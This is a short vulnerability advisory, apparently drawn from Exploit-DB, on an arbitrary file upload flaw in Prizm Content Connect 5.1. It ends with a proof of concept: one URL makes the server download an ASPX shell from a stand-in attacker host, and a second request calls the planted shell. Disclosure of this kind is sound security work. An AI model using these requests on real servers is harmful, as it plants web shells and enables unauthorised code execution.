Prizm Content Connect Arbitrary File Upload Vulnerability

vendor:

Prizm Content Connect

by:

SecurityFocus

7,5

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: Prizm Content Connect

Affected Version From: 5.1

Affected Version To: 5.1

Patch Exists: NO

Related CWE: N/A

CPE: a:accusoft:prizm_content_connect

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

Prizm Content Connect Arbitrary File Upload Vulnerability

Prizm Content Connect is prone to an arbitrary file-upload vulnerability because it fails to adequately validate files before uploading them. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.

Mitigation:

Validate files before uploading them.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/57242/info

Prizm Content Connect is prone to an arbitrary file-upload vulnerability because it fails to adequately validate files before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.

Prizm Content Connect 5.1 is vulnerable; other versions may also be affected. 

Proof of concept

First, the attacker causes the Prizm Content Connect software to download
the malicious ASPX file:

http://www.example.com/default.aspx?document=http://attacker.example.org/aspxshell.aspx

The resulting page discloses the filename to which the ASPX file was
downloaded, e.g.:

Document Location: C:\Project\

Full Document Path: C:\Project\ajwyfw45itxwys45fgzomrmv.aspx

Temp Location: C:\tempcache\

The attacker then requests the ASPX shell from the root of the website:

http://www.example.com/ajwyfw45itxwys45fgzomrmv.aspx